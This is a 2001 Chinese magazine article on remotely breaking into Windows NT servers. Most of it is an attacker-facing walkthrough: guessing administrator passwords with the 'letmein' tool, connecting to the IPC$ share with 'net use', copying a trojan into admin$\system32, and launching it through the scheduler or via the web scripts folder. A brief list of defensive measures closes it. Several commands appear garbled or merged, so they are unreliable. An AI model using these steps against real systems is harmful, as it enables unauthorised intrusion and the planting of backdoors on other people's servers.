远程入侵Windows NT andysoul 2001年 23期 微软推出的Windows NT系统平台,曾经在网络组建上风靡一时,至今还有许多的网络系统使用它,但它的网络漏洞在微软的不断补丁下依然存在,每当我们为它打上微软的补丁后,新的漏洞又出现了。而利用这些漏洞进行网络远端入侵也是相当简单的事了。   现在我们来看看如何远端入侵Windows NT主机!   #1攻击步骤:   首先,我们要攻击远端目标当然得知道对方得IP地址了,你可以使用各种扫描工具查找目标机器的IP地址,这里因为重点不是它所以就不多说了。   在确定攻击目标后,使用Windows NT自带的命令取得远端目标的用户列表资源,分析取得的列表资源,尝试取得管理员权限。letmein命令用于通过指定的密码远程登录服务器,并读取服务器上的用户信息,配以不同的参数,可以获取相应的控制权。例如:   letmein file://x.x.x.x/ -all -g mypwd(将查看\\x.x.x.x上的所有用户账户列表,并试图通过参数后面跟随的密码取得管理员的控制权)   letmein file://x.x.x.x/ -admin -g mypwd   (可以查看\\x.x.x.x上管理员的账户列表,并试图通过参数后面跟随的密码取得管理员的控制权。)   letmein file://x.x.x.x/ -all -d mypwd   (试图通过参数后面跟随的密码取得用户控制权,并显示\\x.x.x.x上所有用户名列表。)   当使用letmein命令获取相关管理员权限后,使用Windows提供的标准命令连接远程资源并将木马拷入远程目标,你可以使用的木马是很多的,这里不作介绍了,具体的命令是:   net use \\x.x.x.x\ipc$ "pass"/user:"user" (利用刚刚猜解到的用户名和密码登录\\x.x.x.x主机)   copy x:\netserver.exe \\x.x.x.x\admin$\system32(拷贝本地木马程序netserver.exe到远端\\x.x.x.x的管理员目录下)   再使用合法Windows NT命令远程启动刚才考入的木马程序:   netsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe/port:yourport /nomsg   在上面的命令中利用了Windows NT的任务计划管理,在指定的时间和指定的端口运行木马程序。   另一种方法:   将需要运行的木马或其他可执行程序Copy到远端服务器的www可执行目录下( 如cgi-bin或scripts等),然后在浏览器键入远端连接url来运行木马程序,如:http://x.x.x.x/scripts/ntsrver.exe/port:yourport或http://x.x.x.x/cgi-gin/ntsrver.exe/port:yourport等。   到此,该次入侵可以算成功了,远程资源已在自己的控制下。   #1攻击原理:   简单分析一下这次攻击的过程,不难看出,关键步骤是利用letmein取得admin权限,但是很不幸,就目前部分的采用Windows NT系统平台服务器而言,所采用的网络管理密码,利用破解工具仅仅多花几分钟就能破解掉。同时,通过对某些大的公共平台服务器进行测试扫描的结果,使用Windows NT系统平台的服务器,其管理密码被letmein猜中率有75%以上。而且在这些被进入的机器上,SMB(文件和打印共享)又都是运行在TCP/IP协议上,而且只有部分服务器有配备火墙,一般没有封闭对外的137∽139端口,从而给网络入侵留下了后门。   #1防范措施:   1.管理人员应该及时检查日记和监控服务的运行,定时对文件系统的权限受托关系进行检查。   2.对密码的选择有一个好的习惯。一个好的密码必须包括下面的内容:好记忆、不易被猜到、易输入,至于怎么才能作到,很多文章都有介绍的,这里就不多讲。   3.适当配置NT网络服务,特别是TCP/IP协议,尽量不要在对外的服务上绑定共享服务。   4.防火墙的配置要合理,屏蔽一切不需要的服务端口,像在TCP/IP上的137∽139端口,开这些端口只会使你的系统处于危险的处境,如果必须要在远程使用这些端口的服务,建议使用其他软件来代替,而不是单纯使用系统内定的服务。